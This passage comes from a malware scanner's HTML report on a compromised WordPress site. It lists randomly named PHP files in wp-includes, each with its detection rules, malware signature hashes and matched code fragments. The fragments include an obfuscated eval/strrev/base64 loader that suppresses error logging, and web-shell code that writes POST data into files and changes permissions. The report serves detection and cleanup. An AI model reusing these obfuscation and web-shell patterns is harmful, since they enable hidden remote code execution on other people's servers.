#007700">,</span><span style="color: #DD0000">'+'</span><span style="color: #007700">,</span><span style="color: #DD0000">'c'</span><span style="color: #007700">,</span><span style="color: #DD0000">'@'</span><span style="color: #007700">,</span><span style="color: #DD0000">'d'</span><span style="color: #007700">,</span><span style="color: #DD0000">'3'</span><span style="color: #007700">,</span><span style="color: #DD0000">'r'</span><span style="color: #007700">,</span><span style="color: #DD0000">'F'</span><span style="color: #007700">,</span><span style="color: #DD0000">')'</span><span style="color: #007700">,</span><span style="color: #DD0000">'B'</span><span style="color: #007700">,</span><span style="color: #DD0000">'y'</span><span style="color: #007700">,</span><span style="color: #DD0000">'C'</span><span style="color: #007700">,</span><span style="color: #DD0000">'J'</span><span style="color: #007700">,</span><span style="color: #DD0000">'q'</span><span style="color: #007700">,</span><span style="color: #DD0000">'G'</span><span style="color: #007700">,</span><span style="color: #DD0000">'#'</span><span style="color: #007700">,</span><span style="color: #DD0000">'S'</span><span style="color: #007700">,</span><span style="color: #DD0000">'o'</span><span style="color: #007700">,</span><span style="color: #DD0000">'H'</span><span style="color: #007700">,</span><span style="color: #DD0000">'4'</span><span style="color: #007700">,</span><span style="color: #DD0000">'A'</span><span style="color: #007700">,</span><span style="color: #DD0000">'i'</span><span style="color: #007700">,</span><span style="color: #DD0000">'j'</span><span style="color: #007700">,</span><span style="color: #DD0000">'t'</span><span style="color: #007700">,</span><span style="color: #DD0000">'v'</span><span style="color: #007700">,</span><span style="color: #DD0000">'w'</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 40</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">implode</span><span style="color: #007700">(</span><span style="color: #DD0000">' / '</span><span style="color: #007700">, </span><span style="color: #0000BB">$breadcrumbs</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 43</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getPermissions</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 47</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"</span><span style="color: #0000BB">$readable</span><span style="color: #DD0000"> </span><span style="color: #0000BB">$writable</span><span style="color: #DD0000"> </span><span style="color: #0000BB">$executable</span><span style="color: #DD0000">"</span><span style="color: #007700">;}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 49</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">formatFileSize</span><span style="color: #007700">(</span><span style="color: #0000BB">$bytes</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 50</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">round</span><span style="color: #007700">(</span><span style="color: #0000BB">$bytes </span><span style="color: #007700">/ </span><span style="color: #0000BB">1073741824</span><span style="color: #007700">, </span><span style="color: #0000BB">2</span><span style="color: #007700">) . </span><span style="color: #DD0000">' GB'</span><span style="color: #007700">; }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 51</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">round</span><span style="color: #007700">(</span><span style="color: #0000BB">$bytes </span><span style="color: #007700">/ </span><span style="color: #0000BB">1048576</span><span style="color: #007700">, </span><span style="color: #0000BB">2</span><span style="color: #007700">) . </span><span style="color: #DD0000">' MB'</span><span style="color: #007700">; }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 52</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">round</span><span style="color: #007700">(</span><span style="color: #0000BB">$bytes </span><span style="color: #007700">/ </span><span style="color: #0000BB">1024</span><span style="color: #007700">, </span><span style="color: #0000BB">2</span><span style="color: #007700">) . </span><span style="color: #DD0000">' KB'</span><span style="color: #007700">; }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 53</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$bytes </span><span style="color: #007700">. </span><span style="color: #DD0000">' By'</span><span style="color: #007700">; }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 62</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">renderFileList</span><span style="color: #007700">(</span><span style="color: #0000BB">$GetPath</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 87</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">LoadFile</span><span style="color: #007700">(</span><span style="color: #0000BB">$GetPath</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign ae7830db <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: ae7830db)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Y2hy</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_64").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-includes/3agUsxi4XtC.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 51.75 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-04-08 19:41:30</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-04-08 19:41:30</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 4</span><br><table id="file_65" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'OykpKSkpKSkpKSkpKSkpKSkpKSldODAwMDB4MFtd+KbLW1NMQUJPTEckKDVNaUUyRVZSbkFBZ1VwT1RfKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlfTspKSkpT0REc1Bnb18kKGxaWVZfKGs4ZmRHSktUV18kKGV0YWxmbml6Zyh2ZXJydHMgbnJ1dGVyO2s4ZmRHSktUV18kbGFib2xnO0pyWU42XyRsYWJvbGd7KU9ERHNQZ29fJCg1TWlFMkVWUm5BQWdVcE9UXyBub2l0Y251ZjtdNzAwMHgwW134pstbU0xBQk9MRyQ9azhmZEdKS1RXXyQ7XTYwMHgwW134pstbU0xBQk9MRyQ9SnJZTjZfJH07OUVZYm1fJCBucnV0ZXI7KSkpXTUweDBbXfimy1tTTEF...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #DD0000">'; $MAIqK = '</span><span style="color: #0000BB">strrev</span><span style="color: #DD0000">'; ini_set('</span><span style="color: #0000BB">display_errors</span><span style="color: #DD0000">', 0); ini_set('</span><span style="color: #0000BB">error_log</span><span style="color: #DD0000">', NULL); error_reporting(0); ini_set('</span><span style="color: #0000BB">log_errors</span><span style="color: #DD0000">', 0); eval($MAIqK($eyxBz('</span><span style="color: #0000BB">OykpKSkpKSkpKSkpKSkpKSkpKSldODAwMDB4MFtd</span><span style="color: #007700">+</span><span style="color: #0000BB">KbLW1NMQUJPTEckKDVNaUUyRVZSbkFBZ1VwT1RfKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2Z</span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">$MAIqK</span><span style="color: #007700">(</span><span style="color: #0000BB">$eyxBz</span><span style="color: #007700">(</span><span style="color: #DD0000">'OykpKSkpKSkpKSkpKSkpKSkpKSldODAwMDB4MFtd+KbLW1NMQUJPTEckKDVNaUUyRVZSbkFBZ1VwT1RfKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlfTspKSkpT0REc1Bnb18kKGxaWVZfKGs4ZmRHSktUV18kKGV0YWxmbml6Zyh2ZXJydHMgbnJ1dGVyO2s4ZmRHSktUV18kbGFib2xnO0pyWU42XyRsYWJvbGd7KU9ERHNQZ29fJCg1TWlFMkVWUm5BQWdVcE9UXyBub2l0Y251ZjtdNzAwMHgwW134pstbU0xBQk9MRyQ9azhmZEdKS1RXXyQ7XTYwMHgwW134pstbU0xBQk9MRyQ9SnJZTjZfJH07OUVZYm1fJCBucnV0ZXI7KSkp...</span>
</span>
</code></code></td></tr><tr><td><p><b>Function strrev eval_strrev <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Encoded Function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">LavE</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign de12c454 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: de12c454)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">VJag</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign f9dc0a55 <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: f9dc0a55)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'base64_decode'</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_65").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-includes/I5dbjVfHZ7e.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 28.35 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-04-08 23:17:55</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-04-08 23:17:55</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 44</span><br><table id="file_66" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit download_remote_code2 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 652</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">fwrite </span><span style="color: #007700">(</span><span style="color: #0000BB">$fp</span><span style="color: #007700">, </span><span style="color: #0000BB">$_POST </span><span style="color: #007700">[</span><span style="color: #DD0000">'new'</span><span style="color: #007700">])</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit eval_base64 <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RCE (Remote Code Execution), through Base64 text, allow remote attackers to execute arbitrary commands or code on the target machine</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'; $search_str2 = '</span><span style="color: #007700">Array(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'; $search_str3 = '</span><span style="color: #007700">@</span><span style="color: #0000BB">$isbot</span><span style="color: #DD0000">'; $search_str4 = '</span><span style="color: #007700">@require</span><span style="color: #DD0000">'; $search_str5 = '</span><span style="color: #007700">eval(</span><span style="color: #0000BB">gzuncompress</span><span style="color: #007700">(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'; $search_str6 = '</span><span style="color: #007700">@include </span><span style="color: #DD0000">"\x2'; </span><span style="color: #0000BB">$search_str7</span><span style="color: #DD0000"> = '</span><span style="color: #0000BB">$OO</span><span style="color: #DD0000">'; </span><span style="color: #0000BB">$search_str8</span><span style="color: #DD0000"> = 'cache=00'; </span><span style="color: #0000BB">$search_str9</span><span style="color: #DD0000"> = 'file_get_contents(\"../index.php\")</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit execution <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP</p><p><i>[<a href="https://cwe.mitre.org/data/definitions/77.html" target="_blank" class="text-primary">https://cwe.mitre.org/data/definitions/77.html</a>, <a href=" https://cwe.mitre.org/data/definitions/78.html" target="_blank" class="text-primary"> https://cwe.mitre.org/data/definitions/78.html</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$_POST</span><span style="color: #DD0000">'; $search_str12 = '</span><span style="color: #0000BB">multipart</span><span style="color: #007700">/</span><span style="color: #0000BB">form</span><span style="color: #007700">-</span><span style="color: #0000BB">data</span><span style="color: #DD0000">'; if (!file_exists($finderdata_path)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"no have permission for chmod!"</span><span style="color: #007700">; } else { if (!</span><span style="color: #0000BB">chmod</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">, </span><span style="color: #0000BB">0755</span><span style="color: #007700">)) return </span><span style="color: #DD0000">"no have permission for chmod!"</span><span style="color: #007700">; </span><span style="color: #0000BB">$fp </span><span style="color: #007700">= </span><span style="color: #0000BB">fopen </span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">, </span><span style="color: #DD0000">"w"</span><span style="color: #007700">); if (</span><span style="color: #0000BB">fwrite </span><span style="color: #007700">(</span><span style="color: #0000BB">$fp</span><span style="color: #007700">, </span><span style="color: #0000BB">$_POST </span><span style="color: #007700">[</span><span style="color: #DD0000">'new'</span><span style="color: #007700">])) </span><span style="color: #0000BB">$message </span><span style="color: #007700">= </span><span style="color: #DD0000">' - <font color="green"><b>Edited!</b></font>'</span><span style="color: #007700">; else </span><span style="color: #0000BB">$message </span><span style="color: #007700">= </span><span style="color: #DD0000">' - <font color=</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 105</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"no have permission for chmod!"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 109</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"can not delete!"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 111</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"ok!"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 151</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">unzip_file</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 164</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">read_file</span><span style="color: #007700">(</span><span style="color: #0000BB">$file_name</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 172</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$arr_file</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 181</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clear_folder</span><span style="color: #007700">(</span><span style="color: #0000BB">$dir</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 202</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">only_read</span><span style="color: #007700">(</span><span style="color: #0000BB">$file_name</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 233</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$original_file</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 236</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">findshells</span><span style="color: #007700">(</span><span style="color: #0000BB">$start</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 262</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$arr_filename</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 279</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">';</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 289</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$_POST</span><span style="color: #DD0000">';</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 39</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string</span><span style="color: #007700">|</span><span style="color: #0000BB">void The string of the URL</span><span style="color: #007700">, if </span><span style="color: #0000BB">redirect needed</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 41</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">DirFilesR</span><span style="color: #007700">(</span><span style="color: #0000BB">$dir</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 441</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_filesize</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 455</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$filesize</span><span style="color: #007700">.</span><span style="color: #DD0000">" gb"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 460</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$filesize</span><span style="color: #007700">.</span><span style="color: #DD0000">" mb"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 466</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$filesize</span><span style="color: #007700">.</span><span style="color: #DD0000">" kb"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 472</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$filesize</span><span style="color: #007700">.</span><span style="color: #DD0000">" b"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 476</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_time</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 478</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"no info"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 483</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$time</span><span style="color: #007700">;</span>
</span>
